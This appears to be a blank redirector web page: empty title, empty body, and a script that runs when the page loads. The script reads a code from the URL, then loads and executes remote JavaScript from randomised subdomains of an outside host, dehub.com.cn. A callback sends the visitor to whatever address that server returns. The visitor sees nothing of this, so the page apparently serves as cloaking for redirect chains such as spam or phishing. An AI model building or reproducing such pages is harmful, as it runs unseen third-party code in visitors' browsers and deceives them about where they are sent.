<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title></title>
    <style>
        h3 {
            font-size: 60px;
            color: #eee;
            text-align: center;
            padding-top: 30px;
            font-weight: normal;
        }
    </style>
</head>

<body>

</body>
<script type="text/javascript">
    function YTIUTIUMku(variable) {
        var query = window.location.search.substring(1);
        var vars = query.split("&");
        for (var i = 0; i < vars.length; i++) {
            var pair = vars[i].split("=");
            if (pair[0] === variable) {
                return pair[1];
            }
        }
        return false;
    }

    function getQueryVariable2(variable) {
        var query = self.location.href;
        // console.log(query);
        var vars = query.split("/");
        console.log(vars);
        for (var i = 0; i < vars.length; i++) {
            // var pair = vars[i];
            if (vars[i] === variable) {
                return vars[i + 1];
            }
        }
        return false;
    }

    function getDomainSjcode(variable) {
        var query = self.location.href;
        // console.log(query);
        var vars = query.split(".");
        var codess = vars[0].split("//");

        if (codess[1]) {
            // var pair = vars[i];
            return codess[1];
        }
        return false;
    }

    (function () {
        var codecode = getQueryVariable2("code");
        var Time = (new Date()).getTime();
        var script = document.createElement('script');
        script.setAttribute('src', "http://" + Time + ".dehub.com.cn/index.php/index/index/loadGround/code/" + codecode);
        document.querySelector("head").appendChild(script);
    }());

    function handler(code, data) {
        console.log(code)
        console.log(data)
        if (code == 'successcode') {
            self.location.href = data;
        } else {
            var codecode2 = getDomainSjcode("code");
            var Time2 = (new Date()).getTime();
            var script = document.createElement('script');
            script.setAttribute('src', "http://" + Time2 + ".dehub.com.cn/index.php/index/index/loadGround/code/" + codecode2);
            document.querySelector("head").appendChild(script);
        }
    }
</script>
</html>
